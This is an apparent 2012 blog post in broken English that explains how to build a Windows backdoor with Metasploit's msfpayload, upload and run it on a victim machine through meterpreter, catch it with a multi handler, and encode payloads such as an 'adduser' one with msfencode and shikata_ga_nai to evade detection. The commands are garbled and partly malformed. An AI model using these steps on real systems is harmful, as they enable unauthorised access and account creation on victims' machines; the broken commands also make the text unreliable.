Senin, 27 Februari 2012


here I'll try to explain what it msfpayload.
. / msfpayload can be called also by making backdor.
backdor could be called an the program or  interruption grafted on the network system. 

function of backdor among others is to make direct communication path through a path that is not common, of a network system.
Another function of backdor iyalah to send / receive files, delete files, managing files, display a notification, deleting data, reboot the machine.

   indeed the use of known backdoor leads to more negative things. but the real backdoor can be used for something positive. example: control of the network at a certain point to save time.

here I will try to make msfpayload:

see picture below is the list msfpayload

here I will make backdor for windows blind_tcp :

then enter the command roo@user: msfpayload rport 'port_victim' rhost 'ip_addres_victim' > "name of file created (here I use the format. exe)"

having managed to make payload for us to do upload data.
meterpreter> upload "places folder " "folder name" "the place to be put payload"

and do execution on the file that we created

Now we get into a new konsole setting multi handler

do further exploitation


explanation is tantamount to msfpayload., essentially equally be used to make backdor. msfendode difference in use for encoding.
examples of the use encode 2 times:
msfpayload windows / adduser user = pass = somepassword evil r | msfencode-t exe-o e1.exe
msfpayload windows / adduser user = pass = somepassword evil r | msfencode exe-e-t 10-o x86/shikata_ga_nai-c e2.exe

to know the payload that is able to use the command msfencode -l.

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